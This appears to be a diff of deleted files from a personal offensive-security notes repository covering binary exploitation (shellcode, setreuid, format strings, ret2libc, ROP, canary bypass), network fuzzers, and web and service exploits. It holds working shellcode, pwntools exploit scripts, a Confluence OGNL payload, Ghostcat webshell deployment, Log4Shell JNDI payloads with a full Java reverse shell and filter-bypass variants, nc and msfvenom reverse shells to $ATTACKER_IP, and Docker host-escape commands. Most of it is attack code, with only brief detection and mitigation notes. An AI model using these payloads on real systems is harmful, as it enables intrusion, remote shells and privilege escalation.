* Convert return address to little endian `0x7fffffffe2a8` -> `\xa8\xe2\xff\xff\xff\x7f` and put it inside the return address
```sh
run $(python -c "print('\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'+'A'*12+'\xa8\xe2\xff\xff\xff\x7f')")
```
## setuid() and setreuid()
* Shellcode needs `setuid(0)` for effective root uid or the equivalent id of the account needed.
* `/bin/sh` checks real uid not effective uid
* ./shellcodes/setuid_shell.as
### setreuid() in assembler
* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
* `setreuid(1002,1002)` sets the __real__ uid inside the shell to 1002.
* `setreuid()` has `rax` number `\x71` (`113` dec). Args are stored in `rdi` and `rsi`.
* ./shellcode/setreuid_shell.as
```sh
"\x48\x31\xFF\x48\x31\xC0\x48\x31\xF6\x66\xBE\xEA\x03\x66\xBF\xEA\x03\xB0\x71\x0F\x05\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05"
```
* Convert to hex output via [Defuse](https://defuse.ca/online-x86-assembler.htm)
### setreuid() in shellcode using pwntools
* Shellcraft builds a shellcode containing `setreuid()`, without any parameter given the real uid to the file owner.
```sh
* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
shellcraft -f d amd64.linux.setreuid
```
* The uid can be set as an argument
```sh
shellcraft -f d amd64.linux.setreuid <uid>
```
* Prepend this in front of the existing shellcode like this
```sh
run $(python -c "print('\x90' * 99 + '\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B' * 8 + '\x88\xe2\xff\xff\xff\x7f')")
```
* Where the existing shellcode is the following
```sh
\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
```
* Setreuid part is the following
```sh
\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05
```

View File

@ -1,23 +0,0 @@
xor rdi,rdi <------ set the rdi to 0
xor rax,rax
xor rsi, rsi <------ set the rsi to 0
mov si, 1002 <------ put the value 1002 in the lower bits of the rsi
mov di, 1002 <------ put the value 1002 in the lower bits of the rdi
mov al,0x71 <------ put the setruid function in the al register
syscall <------ call the function.
xor rdx,rdx
movabs rbx,0x68732f6e69622fff
shr rbx,0x8
push rbx
mov rdi,rsp
xor rax,rax
push rax
push rdi
mov rsi,rsp
mov al,0x3b
syscall
push 0x1
pop rdi
push 0x3c
pop rax
syscall

View File

@ -1,38 +0,0 @@
//setuid(0) + execve(/bin/sh) - just 4 fun.
//xi4oyu [at] 80sec.com
/*
main(){
__asm( "xorq %rdi,%rdi\n\t"
"mov $0x69,%al\n\t"
"syscall \n\t"
"xorq %rdx, %rdx \n\t"
"movq $0x68732f6e69622fff,%rbx; \n\t"
"shr $0x8, %rbx; \n\t"
"push %rbx; \n\t"
"movq %rsp,%rdi; \n\t"
"xorq %rax,%rax; \n\t"
"pushq %rax; \n\t"
"pushq %rdi; \n\t"
"movq %rsp,%rsi; \n\t"
"mov $0x3b,%al; \n\t"
"syscall ; \n\t"
"pushq $0x1 ; \n\t"
"pop %rdi ; \n\t"
"pushq $0x3c ; \n\t"
"pop %rax ; \n\t"
"syscall ; \n\t"
);
}
*/
main() {
char shellcode[] =
"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31"
"\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c"
"\x58\x0f\x05";
(*(void (*)()) shellcode)();
}
//2009-05-14
//evil.xi4oyu

View File

@ -1,24 +0,0 @@
#!/usr/bin/env python
import sys, time, socket
ip = "192.168.56.102"
port = 31337
timeout = 5
prefix = ""
counter = 100
string = prefix + "A" * counter
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((ip, port))
print ('[+] Sending buffer')
#s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string + '\r\n', "latin1"))
s.recv(1024)
except:
print ("[!] The program can't be reached")
sys.exit(0)
string += counter * 'A'
time.sleep(1)

View File

@ -1,24 +0,0 @@
#!/usr/bin/env python2
import sys,socket
import time
address = '192.168.56.102'
port = 9999
buffer = ['A']
counter = 100
while len(buffer) < 10:
buffer.append('A'*counter)
counter=counter+100
try:
for string in buffer:
print '[+] Sending %s bytes...' % len(string)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((address,port))
s.send(string + '\r\n')
s.recv(1024)
print '[+] Done'
except:
print '[!] Unable to connect to the application. You may have crashed it.'
sys.exit(0)
finally:
s.close()

View File

@ -1,31 +0,0 @@
#!/usr/bin/env python3
import socket, time, sys
ip = "10.10.161.147"
port = 9999
timeout = 5
prefix = ""
string = prefix + "A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
s.recv(1024)
s.send("User" '\r\n')
#print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
s.send(string + '\r\n')
#print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
print(f"fuzzing with {len(string)} bytes")
except:
#print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)

View File

@ -1,8 +0,0 @@
import pwn
r = pwn.remote("10.10.156.228", 9999)
r.recvuntil(":")
r.send("User\r\n")
r.recvuntil(":")
r.send(b'A' * 2200)
r.recvuntil("message:")

View File

@ -1,28 +0,0 @@
# ROP Chaining
## Usage
* Find cyclic buffer size
* Find gadgets via `ropper` or even better `ropstar`
## Example
```python
from pwn import *
s = ssh(host="$TARGET_IP", user="<user>", keyfile="", password="")
p = s.process(['sudo', '<process>'])
offset=<found_offset_len>
# take the ropchain from ropstar
payload = cyclic(offset)
payload += p64(0x4711)
payload += p64(0x235)
payload += p64(0x007)
print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline("/bin/sh")
p.interactive(prompt='')
```

@ -1 +0,0 @@
Subproject commit f025a2e4923b501d68d24fa44b22869a84e29e3e

View File

@ -1,10 +0,0 @@
# Canary Bypass
* Get canary value from stack via string format exploit as an offset
```sh
%42$p
```
* Use the found value to add it to the payload
* Afterwards, if the binary is PIE a pointer to the main or the elf which is stack aligned should be found

View File

@ -1,19 +0,0 @@
#!/usr/bin/env python
from pwn import *
from time import sleep
#elf = context.binary = ELF('./pwn107.pwn107')
#p = process()
p = remote('10.10.216.4', 9007)
sleep(1)
p.sendline(b'%13$p,%19$p') # No. on stack. 1st: canary, 2nd: pointer to main function
sleep(1)
addresses = (p.recv().split())[62].decode().split(',')
print(addresses)
# Payload: Buffer + canary content + bsp + return pointer filled with address of the hidden function
payload = b'A' * 24 + p64(int(addresses[0],16)) + b'B' * 8 + p64(int(addresses[1], 16) - 0x45)
p.sendline(payload)
sleep(1)
p.interactive()

View File

@ -1,105 +0,0 @@
# Format String
* Read and write values from stack
* [axcheron's writeup](https://axcheron.github.io/exploit-101-format-strings/)
## Parameters
|Parameters |Type |Passed as
|-----------------|-------------------------------------------|-----------|
%d decimal (int) value
%u unsigned decimal (unsigned int) value
%x hexadecimal (unsigned int) value
%p hexadecimal (unsigned int), nice layout value
%s string ((const) (unsigned) char*) reference
%n write the number of bytes ypu put in, (*int) reference
## Offset
* Read at offset as pointer value at the 42th argument on the stack
```sh
%42$s
```
* If the pointer at the offset references a string you can dereference by
```sh
%42$s
```
## Length of output
* Padding of the first argument on stack to the given length
```sh
%31337x
```
## Read
* Input `%x` for every value that should be read from the stack. These are the next values at lower addresses, directly under the print format function
```sh
%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
```
* Do long long hex reading from stack
```sh
%llx
```
* Select values as string, e.g. the second value
```sh
%2$s
```
* Another way of reading the pointer is via
```sh
%p
```
* Read pointer on stack at offset 42
```sh
%42$p
```
* [ir0stone's pwn-notes](https://github.com/ir0nstone/pwn-notes/blob/master/types/stack/format-string.md) contains some useful pwntool scripts like this one
```python
from pwn import *
#p = process('./vuln')
p = remote(target_ip, 9006)
payload = b'%14$p||||'
payload += p32(0x8048000)
p.sendline(payload)
log.info(p.clean())
```
## Write
* Writing is done via `%n`
* An example, GOT overwrite. We want to replace the pointer address
* Watch out for the `PTR` from PLT to GOT
```sh
objdump -Mintel -d <binary>
[...]
0000000000401060 <printf@plt>:
401060: ff 25 ca 2f 00 00 jmp QWORD PTR [rip+0x2fca] # 404030 <printf@GLIBC_2.2.5>
401066: 68 03 00 00 00 push 0x3
40106b: e9 b0 ff ff ff jmp 401020 <_init+0x20>
[...]
```
* The `PTR` derefences __0x404030__
* As an example, the parameter is found at arg 6 on the stack
* Write the address of a function that cannot be reached into the PLT `PTR` to GOT through the buffer, so it will execute. The address which should be written is `0x40123b`
* The input is as follows
```sh
%64c%6$n<restof address - 67>c %13$hn
```
* `64c` is `0x40`, rest of address - bytes already + 2 bytes alignment
## Tips and Tricks
* Overwrite GOT when there is no FullRELRO, when it is not read only
* Find the input argument on the stack. Write `AAAA` and look out where it is placed on the stack
```sh
AAAA%6$p
```

View File

@ -1,42 +0,0 @@
# Integral Promotion
* Conditions of data types with different max and min values provoke unforseen comparisions
* Comparing `int` and `uint` with values above max leads to integral promotion
* Check data type min and max
```c
#include <stdio.h>
#include <limits.h>
int main(void)
{
printf("CHAR_MAX: %i\n", CHAR_MAX);
printf("UCHAR_MAX: %i\n", UCHAR_MAX);
printf("SHORT_MAX: %i\n", SHRT_MAX);
printf("USHORT_MAX: %i\n", USHRT_MAX);
printf("INT_MAX: %i\n", INT_MAX);
printf("UINT_MAX: %u\n", UINT_MAX);
return 0;
}
```
* Not only conditions are susceptable to integral promotions, a sum - for example - is too. Values for promotion in this example are `2147483647` and `1`. `c` is negative and leads to the shell
```c
int a,b,c;
if(a >=0 && b >=0)
if(c >= 0){
printf("\n[*] ADDING %d + %d",a,b);
printf("\n[*] RESULT: %d\n",c);
}
else{
system("/bin/sh");
}
else
printf("nope");
```

View File

@ -1,32 +0,0 @@
# Procedure Lookup Table, Global Offset Table
* Both are part of dynamic binaries
* PLT resolves called function address of shared object
* A function call inside the binary, to a function inside a shared object is done via PLT
* __PLT__ contains dynamic address, references GOT
* __GOT__ contains the absolute address of the called functions. Dynamic linker updates the GOT
* __Lazy Linking__ is the process of loading the called SO function after they are called for the first time
## pwn
* Overwrite the GOT address of a called functions, which then will be returned instead
* Check the disassembly of the binary for SO function call
```sh
x/s <functionaddress>
x/3i <functionaddress>
```
* This is the PLT address
* Check the GOT address of the PLT. There should be `PTR` via `jmp` to the GOT address of the function
* Rewrite this address with for example `system`. Take a look where it is placed
```sh
p system
```
* Set the address of the `jmp` to GOT to `system` address
```sh
set *<foundGOTjmpAddress>=<foundSystemAddress>
```
* Fill the buffer with the argument to `system`

View File

@ -1,99 +0,0 @@
# Radare2
## Usage
### Debug
```sh
r2 -d <binary>
```
* Analyze
```sh
aaa
```
* Show all info
```sh
ia
```
* Search for strings
```sh
izz
```
* Main address
```sh
iM
```
* Entrypoint
```sh
ie
```
* Current memory address
```sh
s
```
* Show address of function or register, respectively
```sh
s <func>
sr <reg>
```
* Show main
```sh
pdf @main
```
* Show main and follwing functions
```sh
pd @main
```
* Breakpoint
```sh
db 0xdeadbeef
```
* Show all breakpoints
```sh
dbi
```
* Show rbp-0x4
```sh
px @rbp-0x4
```
* Continue
```sh
dc
```
* Step
```sh
ds
```
* Show registers
```sh
dr
```
* Restart
```sh
ood
```
### Visual Mode
* Enter visual mode via `VV`
* Enter normal mode inside visual mode via `:`
* Add comment via `;`
### Write Mode
* Enter write mode via `w`
* Write cache list via `wc`
* Alter/modify opcode at current seek via `wA`
* Use as follows
```sh
s <memoryaddress>
wx <newOpcode>
dc
```
## AT&T Instructions
* leaq src, dst: this instruction sets dst to the address denoted by the expression in src
* addq src, dst: dst = dst + src
* subq src, dst: dst = dst - src
* imulq src, dst: dst = dst * src
* salq src, dst: dst = dst << src
* sarq src, dst: dst = dst >> src
* xorq src, dst: dst = dst XOR src
* andq src, dst: dst = dst & src
* orq src, dst: dst = dst | src

View File

@ -1,130 +0,0 @@
# Ret2libc
* [ir0nstone ret2libc](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/ret2libc)
* Check binary via
* `checksec`, PIE shows start address, RELRO shows permissions of r/w to got
* `file`
* Libc is affected by ASLR state of the machine, check via `cat /proc/sys/kernel/randomize_va_space`
* Off = 0
* Partial = 1
* Full = 2
* `got` contains dynamically loaded functions
* `plt` contains used loaded dynamical functions
## Finding something to execute
* Interesting stuff to call from inside libc
* `/bin/sh`
* `system`
## libc -- Finding Offsets
* Find libc address at runtime via gbd
```sh
info sharedlibrary
```
### Manually
* On target find `sh` address inside libc
```sh
strings -a -t x /lib32/libc.so.6 | grep /bin/sh
```
* Sub from `system` address from inside libc
```sh
readelf -s /lib32/libc.so.6 | grep system
```
### Measure the Buffer
* With gef
* `pattern create`
* `run`
* Use pattern
* `pattern search $<register>`
## ROP -- Creating a Chain
* Creating a ROP chain to execute the `/bin/sh` with parameters
* Check
* Architecture
* Calling convention
### Manually
```sh
ROPgadget --binary <file> | grep rdi
```
* Find `ret`s, to put in front of rdi
```sh
objdump -d <file> | grep ret
```
## Automated
* [xct's ropstar](https://github.com/xct/ropstar.git)
## Example without ASLR
```python
from pwn import *
p = process('<binary>')
cbase = 0x<libc_base>
sys = cbase + <libc_system>
sh = cbase + <libc_shell>
rop_rdi = <found rop rdi>
rop_ret = <found rop ret>
payload = b'A' * <count>
payload += b'B' * 8
payload += p64(rop_ret)
payload += p64(rop_rdi)
payload += p64(sh)
payload += p64(system)
payload += p64(0x0) # end payload
p.recv()
p.sendline(payload)
p.interactive()
```
## Example with ASLR
* Create context
```python
#!/usr/bin/env python3
from pwn import *
context.binary = binary = '<binary>'
elf = ELF(binary)
rop = ROP(elf)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p = process()
# ROP I, needed when ASL is enabled
payload = b'A' * 18
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(elf.got.gets)
payload += p64(elf.plt.puts)
payload += p64(elf.symbols.main)
p.recvline()
p.sendline(payload)
p.recvline()
leak = u64(p.recvline().strip().ljust(8,b'\0')) # ljust, pre padding for alignement
p.recvline()
log.info(f"gets: {hex(leak)}")
libc.address = leak - libc.symbols.gets
log.info(f"libc address: {hex(libc.address)}") # start address should be aligned
# ROP II
payload = b'A' * 18
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(next(libc.search(b'/bin/sh')))
payload += p64(rop.find_gadget(['ret'])[0])
payload += p64(libc.symbols.system)
p.sendline(payload)
p.recvline()
p.interactive()
```

View File

@ -1,6 +0,0 @@
# DNS Zone Transfer
Relies on misconfiguration of the zone's master. Just query a domain from the master, if possible. Results in a disclosure of subdomains and all records previously made.
```sh
drill axfr test.com @<master-DNS>
```

View File

@ -1,33 +0,0 @@
# Hash Collisions
# SHA-1
* http://shattered.io
* The following code is taken from a writeup from [bl4ade's repo](https://github.com/bl4de/ctf/blob/master/2017/BostonKeyParty_2017/Prudentialv2/Prudentialv2_Cloud_50.md)
```python
#!/usr/bin/env python
import requests
# this is copy/paste from Hex editor - two different files with the same SHA1 checksum
name = '255044462D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7F46DC93 A6B67E01 3B029AAA 1DB2560B 45CA67D6 88C7F84B 8C4C791F E02B3DF6 14F86DB1 690901C5 6B45C153 0AFEDFB7 6038E972 722FE7AD 728F0E49 04E046C2 30570FE9 D41398AB E12EF5BC 942BE335 42A4802D 98B5D70F 2A332EC3 7FAC3514 E74DDC0F 2CC1A874 CD0C7830 5A215664 61309789 606BD0BF 3F98CDA8 044629A1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
password = '25504446 2D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7346DC91 66B67E11 8F029AB6 21B2560F F9CA67CC A8C7F85B A84C7903 0C2B3DE2 18F86DB3 A90901D5 DF45C14F 26FEDFB3 DC38E96A C22FE7BD 728F0E45 BCE046D2 3C570FEB 141398BB 552EF5A0 A82BE331 FEA48037 B8B5D71F 0E332EDF 93AC3500 EB4DDC0D ECC1A864 790C782C 76215660 DD309791 D06BD0AF 3F98CDA4 BC4629B1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
print '[+] create URL decoded strings to send as GET parameters [name] and [password]...'
name = ''.join(name.split(' '))
password = ''.join(password.split(' '))
namestr = ''.join(['%' + name[i] + name[i + 1]
for i in range(0, len(name)) if i % 2 == 0])
passwordstr = ''.join(['%' + password[j] + password[j + 1]
for j in range(0, len(password)) if j % 2 == 0])
print '[+] sending request to http://54.202.82.13/?name=[name]&password=[password]'
u = 'http://54.202.82.13/?name={}&password={}'.format(namestr, passwordstr)
resp = requests.get(u, headers={
'Host': '54.202.82.13'
})
```

View File

@ -1,3 +0,0 @@
# ImageTragick
* [ImageTragick Website](https://imagetragick.com)

@ -1 +0,0 @@
Subproject commit e464facbc761a1b3530181a6f37c95925c197551

View File

@ -1,23 +0,0 @@
# CVE-2022-26134
* [NIST CVE-2022-26134](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
* Confluence versions:
* 1.3.0 to 7.4.17
* 7.13.0 to 7.13.7
* 7.14.0 to 7.14.3
* 7.15.0 to 7.15.2
* 7.16.0 to 7.16.4
* 7.17.0 to 7.17.4
* 7.18.0 to 7.18.1
* Object Graph Navigation Language (OGNL)
## Usage
* Payload is a GET request which is set via the URI
```sh
${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/
```
* URL encode and curl for PoC
* Use [Naqwda's exploit](https://github.com/Nwqda/CVE-2022-26134.git)

View File

@ -1,19 +0,0 @@
# Ghidra Debug RCE
* If debug mode is enabled, connect to it via `jdb`
```sh
jdb -attach $TARGET_IP:$TARGET_PORT
```
```sh
classpath
classes
```
* Stop the service
```sh
stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
```
* Wait until the breakpoint hits and start a reverse shell
```sh
print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh")
```

View File

@ -1,14 +0,0 @@
# Ghostcat
* CVE-2020-1938
* Msfconsole or [exploitdb](https://www.exploit-db.com/exploits/48143)
* Craft a manual war shell shown at [hacktrick's tomcat site](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#reverse-shell)
* upload the file via
```sh
curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello
```
* Visit the webshell at `$TARGET_IP:8080/shello/`
* Alternatively use a war reverse shell via
```sh
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war
```

@ -1 +0,0 @@
Subproject commit ceae24f4ebdbbdfc1dc350bab4d512d9dcf8027c

View File

@ -1,133 +0,0 @@
# Log4Shell
* `log4j` < version 2.15.0rc2
* [CVE-2021-44228](https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java)
* [log4j vulnerability tester](https://log4shell.huntress.com/)
* [List of exploitable services](https://github.com/YfryTchsGD/Log4jAttackSurface)
* Code inside a `param` value is parsed and a `${payload}` will be executed, for example
```sh
${sys:os.name}
${sys:user.name}
${log4j:configParentLocation}
${ENV:PATH}
${ENV:HOSTNAME}
${java:version}
```
## Java Naming and Directory Interface JNDI
* Vulnerability can be exploited via `${jndi:ldap://<attacker-IP>/foo}`
## POC
```sh
curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449\}'
```
* Use HTTP header field as storage for payload or any other possible input field
```HTTP
X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo}
Accept: ${jndi:ldap://$ATTACKER_IP:1389/foo}
X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
```
## Usage
* Fuzz endpoints to applicate the exploit on
* Clone and build [marshallsec](https://github.com/mbechler/marshalsec) via `mvn clean package -DskipTests`
* Java version should be the same as the one on the target
* A Proxy LDAP server to an HTTP server is needed
* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
```java
public class Exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash $ATTACKER_IP 4449");
} catch (Exception e) {
e.printStackTrace();
}
}
}
```
or another one
```java
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
static {
String host = "$ATTACKER_IP";
int port = 4711;
String cmd = "/bin/sh";
try {
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0)
so.write(pi.read());
while (pe.available() > 0)
so.write(pe.read());
while (si.available() > 0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e) {
}
}
p.destroy();
s.close();
} catch (Exception e) {
}
}
}
```
* Run the LDAP, HTTP and reverse shell
```sh
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
```
```sh
php -S 0.0.0.0:8000
```
```sh
nc -lvnp 4449
```
* Trigger via `curl 'http://$TARGET:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'`
## Detection
* [Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes.git)
* [Vulnerable Class + Jar hashes](https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2021-44228)
* [reddit mega thread](https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/)
* [Yara rules](https://github.com/darkarnium/CVE-2021-44228)
* Parse logs for `jndi`
## Obfuscation
* Possible bypasses are as follows
```sh
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
${${::-j}ndi:rmi://attackerendpoint.com/}
```
## Mitgation
* [Apache Solr security news](https://solr.apache.org/security.html)
* Add the following line to `solr.in.sh`
```toml
SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
10.10.90.21210.10.90.212
```

View File

@ -1,14 +0,0 @@
# CVE-2022-22965
* [Mitre CVE details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-22965)
* Follow up to CVE-2010-1622 by circumventing the patch for the vulnerability
* RCE of `*.jsp` files through tomcat HTTP post request
* Conditions
* > jdk9
* Spring framework < 5.2, 5.2.0-19, 5.3.0-17
* Apache tomcat
* spring as WAR package
* `spring-webvmc` or `spring-webflux` components of the spring framework

@ -1 +0,0 @@
Subproject commit c7d121b3d72aeaded26d5731819afaf49b686df6

View File

@ -1,185 +0,0 @@
# Docker Vulnerabilities
* [Container enumeration](https://github.com/stealthcopter/deepce)
## Abusing Registry
* [Registry Doc](https://docs.docker.com/registry/spec/api/)
* Registry is a json API endpoint
* Private registry added in `/etc/docker/daemon.json`
* Can be found by nmap as a service
### Enumeration
* General query
```sh
curl http://test.com:5000/v2/_catalog`
```
* List tags
```sh
curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
```
* `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
```sh
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
```
## Reversing Docker Images
* [Dive](https://github.com/wagoodman/dive)
```sh
dive <IMAGE-ID>
```
## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## RCE via Exposed Docker Daemon
* Users inside the `docker` group may open tcp socket through docker
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
* Confirming via `curl http://test.com:2375/version` on open docker port
* Execute commands on socket
```sh
docker -H tcp://test.com:2375 ps
docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
```
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
## Escape Container via Exposed Docker Daemon
* Looking for exposed docker sockets
```sh
find / -name "*sock"
groups
```
* Mount the host volume and chroot to it, need alpine image.
```sh
docker images
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
or
```sh
docker run -v /:/host --rm -it <imageID> chroot /host/ bash
```
## Shared Namespaces
* Namespaces
* Cgroups
* OverlayFS
* Requires root inside the container
* Execute command
```sh
nsenter --target 1 --mount sh
```
## Misconfiguration
* Privileged container connect to the host directly, not through the docker engine
* Execution of bins on the host from libs inside the container is possible
```sh
capsh --print
```
* `man capabilities`
